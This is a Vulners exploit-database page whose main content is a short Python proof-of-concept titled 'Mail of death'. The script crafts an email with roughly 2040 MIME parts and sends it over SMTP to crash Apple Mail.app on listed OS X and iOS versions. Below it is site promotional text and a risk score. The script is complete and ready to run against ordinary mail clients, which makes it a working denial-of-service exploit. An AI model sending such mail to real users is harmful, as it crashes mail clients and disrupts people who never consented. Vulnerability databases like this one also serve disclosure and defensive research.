Vulners
Lucene search
Apple Mail.app mail拒绝服务漏洞
#!/usr/bin/env python
# Mail of death for Apple's Mail.app
#
# Tested & vulnerable: Leopard/Intel, Snow Leopard, Lion (up to 10.7.2), IOS 4.2.x, 4.3.3
# Tested != vulnerable: Leopard/PPC
# Create mail with n_attach MIME attachments
# Version 1.0; shebang42
import smtplib
n_attach=2040 # ~2024 is sufficient
relay='your.mta.goes.here'
mailfrom = 'mail_of_death () example com'
mailto = mailfrom
subject = 'PoC Apple Mail.app mail of death'
date = 'October 29, 2011 10:00:00 GMT'
def craft_mail():
header = 'From: %s\nTo: %s\nSubject: %s\nDate: %s\nContent-Type: multipart/mixed ; boundary="delim"\n\n' %
(mailfrom, mailto, subject, date)
body = '--delim\nContent-Type: text/plain\nContent-Disposition: inline\n\nHello World\nBye Mail.app\n\n\n'
attach = '--delim\nContent-Disposition: inline\n\n'*n_attach
### Another, slightly longer option to crash Mail.app (same bug)
# attach = '--delim\nContent-Type: text/plain\nContent-Disposition: attachment;
filename=AAAAAAAA\n\ncontent\n'*n_attach
return header + body + attach
def send_mail(mail):
server = smtplib.SMTP(relay)
server.sendmail(mailfrom, mailto, mail)
server.quit()
mail=craft_mail()
#print mail
send_mail (mail)
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
01 Nov 2011 00:00Current
7.1High risk
Vulners AI Score7.1